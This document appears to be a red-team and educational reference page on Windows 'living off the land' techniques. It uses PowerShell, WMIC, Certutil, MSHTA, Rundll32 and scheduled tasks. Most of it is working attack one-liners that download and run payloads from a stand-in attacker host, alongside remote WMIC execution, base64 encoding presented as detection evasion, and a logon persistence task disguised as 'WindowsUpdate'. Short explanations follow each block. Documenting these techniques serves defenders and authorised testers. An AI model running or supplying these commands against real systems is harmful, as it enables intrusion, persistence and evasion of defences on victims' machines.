# Living off the Land Attacks

Hackers use legitimate services and tools present on the victim device by default to carry out malicious activities such as Powershell, WMIC, Certutil etc (in context of Windows).&#x20;

Below are few examples of different services being deployed for LOL Attacks. (can be used for red teaming reference too)

## Powershell

```
PS C:\> powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
PS C:\> powershell -NoP -NonI -W Hidden -EncodedCommand SQBn...Base64...
PS C:\> powershell -NoP -NonI -Command "Invoke-WebRequest 'http://attacker.example/file.exe' -OutFile 'C:\Users\Public\updater.exe'; Start-Process 'C:\Users\Public\updater.exe'"
```

Here the first command fetches a file from an online server and executes it directly into the memory without storing it on the disk. The second statement hides the payload in a base64 string and finally in the third statement, the file is downloaded and executed.

## WMIC

Abbreviation for Windows Management Instrumentation Command Line) which  allows admins to manage local and remote systems. It's exploited by threat actors to execute malicious commands remotely.&#x20;

```
PS C:\> wmic /node:TARGETHOST process call create "powershell -NoP -Command IEX(New-Object Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
PS C:\> wmic /node:TARGETHOST process get name,commandline
PS C:\> wmic process call create "notepad.exe" /hidden
```

1. A new Powershell process is created which downloads a malicious `payload.ps1`  file and executes it.&#x20;
2. The tool queries the remote system for its running processes and command lines, returning structured info useful for reconnaissance across hosts.
3. The local **WMIC** `process call create` API is used to spawn `notepad.exe` On the same machine, the optional hiding flag demonstrates how an attacker might try to make a spawned process less visible.

## Certutil

Built for certificate management but is also used to download files and decode base64 payloads easily.&#x20;

```
PS C:\> certutil -urlcache -split -f "http://attacker.example/payload.exe" C:\Users\Public\payload.exe
PS C:\> certutil -decode C:\Users\Public\encoded.b64 C:\Users\Public\decoded.exe
PS C:\> certutil -encode C:\Users\Public\payload.exe C:\Users\Public\payload.b64
```

1. Downloads a file payload.exe on the victim device.
2. Decodes the encoded base64 data from `encoded.b64` and writes the decoded binary data to `decoded.exe`.&#x20;
3. Encodes the exe to base64 to evade detection.

## MSHTA

Runs HTML Application (HTA) files, which can contain VBScript or JavaScript code.

```
PS C:\> mshta "http://attacker.example/payload.hta"
PS C:\> mshta "javascript:var s=new ActiveXObject('WScript.Shell');s.Run('powershell -NoP -NonI -W Hidden -Command "Start-Process calc.exe"');close();"
PS C:\> mshta "C:\Users\Public\malicious.hta"
```

1. Loads the HTA from a remote server and executes the HTA content in the host context.
2. MSHTA is passed an inline **javascript** URI that creates a **WScript.Shell** ActiveX object and uses it to run **PowerShell**, which then starts a process, this shows how inline script can directly spawn system commands without a saved intermediary.<br>

## Rundll32

Executes functions within DLLs

```
PS C:\> rundll32.exe C:\Users\Public\backdoor.dll,Start
PS C:\> rundll32.exe url.dll,FileProtocolHandler "http://attacker.example/update.html"
PS C:\> rundll32.exe C:\Windows\Temp\loader.dll,Run
```

1. Loads the specified **DLL** and calls its exported Start function, which runs the DLL's code
2. **rundll32** invokes url.dll with **FileProtocolHandler** and a remote URL, causing the system handler to process the remote content, which can bootstrap further activity.
3. Third **rundll32** command is called a crafted export in a temporary **DLL**, which may execute embedded loader logic or shellcode from a file placed in a writable location.

## Scheduled Tasks (schtasks)

Lets administrators run programs or scripts at specified times, on events such as logon, or on a repeating schedule.&#x20;

```
PS C:\> schtasks /Create /SC ONLOGON /TN "WindowsUpdate" /TR "powershell -NoP -NonI -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/ps1')\""
PS C:\> schtasks /Create /SC DAILY /TN "DailyJob" /TR "C:\Users\Public\encrypt.ps1" /ST 00:05
PS C:\> schtasks /Run /TN "WindowsUpdate"
```

1. `WindowsUpdate` task is created which runs Powershell to download and execute a remote script on every user logon.
2. A daily task (cronjob in context of Linux) is created to run a malicious powershell file at 00:05.
3. The attacker triggers the named task to run immediately, invoking its configured action on demand.